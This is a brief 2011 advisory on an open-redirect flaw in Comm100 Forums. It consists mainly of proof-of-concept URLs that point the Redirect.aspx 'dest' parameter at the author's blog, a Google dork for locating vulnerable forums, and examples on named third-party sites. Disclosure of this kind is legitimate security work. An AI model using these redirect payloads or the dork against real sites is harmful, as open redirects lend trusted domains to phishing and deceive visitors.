Comm100 Forums suffer from an arbitrary redirect vulnerability.
c1780f137d1adad1e7e5f0b33c9d64fe94f03d734a387241a04fac7243b792b7
# Date: 8.10.2011
# Author: Sony
# Software Link: http://comm100.com/
# Google Dorks: Forum Powered by Comm100
# Blog : http://st2tea.blogspot.com
..................................................................
Demo:
http://hosted.comm100.com/Forum/Default.aspx?siteid=10000
Before:
http://hosted.comm100.com/Forum/Redirect.aspx?information=Querystring%20with%20name%20\%27siteId\%27%20is%20null&dest=http%3a%2f%2fwww.comm100.com%2fforum
After:
http://hosted.comm100.com/Forum/Redirect.aspx?information=welcome to my
blog&dest=http://st2tea.blogspot.com
Some Demo:
http://support.newpotatotech.com/Forum/Redirect.aspx?information=welcome%20to%20my%20blog%20&dest=http://st2tea.blogspot.com
http://www.theabrasivescompany.com/Forum/Redirect.aspx?information=welcometo
my blog&dest=
http://st2tea.blogspot.com